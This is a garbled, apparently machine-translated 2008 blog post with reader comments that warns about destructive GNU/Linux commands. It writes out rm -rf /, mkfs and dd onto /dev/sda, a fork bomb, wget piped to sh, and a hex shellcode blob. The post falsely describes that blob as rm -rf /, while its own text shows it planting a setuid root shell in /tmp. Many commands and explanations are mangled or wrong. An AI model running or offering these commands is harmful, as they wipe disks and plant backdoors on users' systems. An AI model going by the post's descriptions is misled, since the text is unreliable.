Monday, December 8, 2008

The 7 most dangerous commands of GNU/Linux

1. rm-rf /
This powerful command deletes all files in our root directory "/" if they want to see the power of this command to see this video

2. Code:

char esp [] __attribute__ ((section (. "text"))) / * esp
release * /
= "\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68?
"\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99?
"\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7?
"\ X56 \ X04 \ xf7 \ X56 \ x08 \ xf7 \ X56 \ x0c \ X83 \ xc4 \ x74 \ X56?
"\ X8d \ x73 \ x08 \ X56 \ x53 \ x54 \ X59 \ xb0 \ x0b \ xcd \ x80 \ x31?
"\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69?
"\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00?
"Cp-p / bin / sh / tmp / .beyond; chmod 4755
/ tmp / .beyond; "

This is the hex version of [rm-rf /] that can deceive even those not experienced users of GNU/Linux.

3. mkfs.ext3 / dev / sda

This will reformat all the files on the device that is mentioned after the mkfs command.

4. :(){:|:&};:

Known as forkbomb, this command to run a large number of processes until the system freezes. This can lead to data corruption.

5. any_command> / dev / sda

This command causes total loss of data, in the partition that is mentioned in command

6. http://some_untrusted_source wget-O-| sh

Never download untrusted sources and below are implemented, they may be malicious codes

7. mv / home / yourhomedirectory / * / dev / null

This command will move all the files in your home to a place that does not exist, never really your files again

If you got any other dangerous command, please let me know, I will include it over here.



  1. This is a good article. Keep up the good work.


  2. how about dd if=/dev/urandom of=/dev/sda

  3. Here's one:
    > /dev/sda
    This is known as "clobbering" a file, or in this case, a hard drive partition. You send absolutely nothing to the hard drive, so the hard drive will look like "absolutely nothing."

  4. @Clorox - You can't truncate a character device as it's not part of a file system.
